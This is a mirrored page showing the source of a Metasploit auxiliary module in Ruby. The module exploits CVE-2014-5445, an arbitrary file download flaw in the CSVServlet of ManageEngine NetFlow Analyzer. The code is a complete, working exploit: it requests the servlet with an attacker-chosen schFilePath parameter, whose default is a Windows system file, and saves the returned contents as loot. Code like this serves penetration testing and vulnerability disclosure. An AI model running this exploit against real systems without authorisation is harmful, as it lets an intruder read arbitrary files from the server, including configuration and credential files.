Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/netflow_file_download.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Auxiliary::Report
8
include Msf::Exploit::Remote::HttpClient
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',
15
'Description' => %q{
16
This module exploits an arbitrary file download vulnerability in CSVServlet
17
on ManageEngine NetFlow Analyzer. This module has been tested on both Windows
18
and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you
19
must escape the backslash with a backslash.
20
},
21
'Author' => [
22
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
23
],
24
'License' => MSF_LICENSE,
25
'References' => [
26
[ 'CVE', '2014-5445' ],
27
[ 'OSVDB', '115340' ],
28
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],
29
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
30
],
31
'DisclosureDate' => '2014-11-30',
32
'Notes' => {
33
'Stability' => [CRASH_SAFE],
34
'SideEffects' => [IOC_IN_LOGS],
35
'Reliability' => []
36
}
37
)
38
)
39
40
register_options(
41
[
42
Opt::RPORT(8080),
43
OptString.new('TARGETURI',
44
[ true, 'The base path to NetFlow Analyzer', '/netflow' ]),
45
OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),
46
]
47
)
48
end
49
50
def run
51
# Create request
52
begin
53
print_status("Downloading file #{datastore['FILEPATH']}")
54
res = send_request_cgi({
55
'method' => 'GET',
56
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),
57
'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }
58
})
59
rescue Rex::ConnectionError
60
print_error('Could not connect.')
61
return
62
end
63
64
# Show data if needed
65
if res && res.code == 200
66
if res.body.to_s.bytesize == 0
67
print_error('0 bytes returned, file does not exist or it is empty.')
68
return
69
end
70
vprint_line(res.body.to_s)
71
fname = File.basename(datastore['FILEPATH'])
72
73
path = store_loot(
74
'netflow.http',
75
'application/octet-stream',
76
datastore['RHOST'],
77
res.body,
78
fname
79
)
80
print_good("File saved in: #{path}")
81
else
82
print_error('Failed to download file.')
83
end
84
end
85
end
86
87